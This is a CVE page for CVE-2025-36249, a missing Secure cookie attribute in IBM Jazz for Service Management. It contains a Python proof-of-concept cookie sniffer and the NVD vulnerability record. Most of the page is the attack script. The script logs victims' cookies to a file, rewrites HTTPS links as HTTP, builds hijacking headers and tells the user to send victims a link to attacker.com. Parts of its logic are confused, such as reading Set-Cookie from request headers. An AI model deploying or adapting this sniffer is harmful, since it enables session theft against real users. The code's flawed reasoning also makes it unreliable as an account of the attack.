CVE-2025-36249

# CVE-2025-36249 PoC - Cookie Hijacking via HTTP # This PoC demonstrates how an attacker can capture cookies when Secure attribute is missing import http.server import socketserver import urllib.parse import json from datetime import datetime class CookieSniffer(http.server.BaseHTTPRequestHandler): def do_GET(self): """Handle incoming HTTP requests and log cookies""" # Parse cookies from request headers cookies = self.headers.get('Cookie', '') cookies += ';' + self.headers.get('Set-Cookie', '') # Log captured information log_entry = { 'timestamp': datetime.now().isoformat(), 'source_ip': self.client_address[0], 'path': self.path, 'cookies': cookies, 'user_agent': self.headers.get('User-Agent', 'Unknown') } print(f"[*] Captured request from {log_entry['source_ip']}") print(f"[*] Cookies: {cookies}") # Save to log file with open('captured_cookies.json', 'a') as f: f.write(json.dumps(log_entry) + '\n') # Send response to keep connection alive self.send_response(200) self.send_header('Content-type', 'text/html') self.end_headers() self.wfile.write(b'<html><body>Loading...</body></html>') def generate_malicious_link(target_url): """Generate HTTP link to capture cookies""" # Convert HTTPS URL to HTTP for the attack attack_link = target_url.replace('https://', 'http://') return attack_link def simulate_cookie_hijack(cookie_value): """Simulate session hijacking using captured cookie""" # This would be used to make authenticated requests headers = { 'Cookie': cookie_value, 'User-Agent': 'Mozilla/5.0 (compatible; SecurityScanner/1.0)' } return headers if __name__ == '__main__': PORT = 8080 print(f"[*] Starting Cookie Sniffer on port {PORT}") print(f"[*] Send this link to victim: http://attacker.com:8080/malicious") with socketserver.TCPServer(("", PORT), CookieSniffer) as httpd: httpd.serve_forever()

{"cve": {"id": "CVE-2025-36249", "sourceIdentifier": "[email protected]", "published": "2025-10-31T13:15:33.823", "lastModified": "2025-11-05T19:47:32.237", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Jazz for Service Management 1.1.3.0 through 1.1.3.25 does not set the secure attribute on authorization tokens or session cookies. Attackers may be able to get the cookie values by sending a http:// link to a user or by planting this link in a site the user goes to. The cookie will be sent to the insecure link and the attacker can then obtain the cookie value by snooping the traffic."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 3.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-614"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:jazz_for_service_management:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.1.3.0", "versionEndExcluding": "1.1.3.26", "matchCriteriaId": "61537CC7-D26B-4A1A-8F9E-4B3917D4015A"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7249820", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}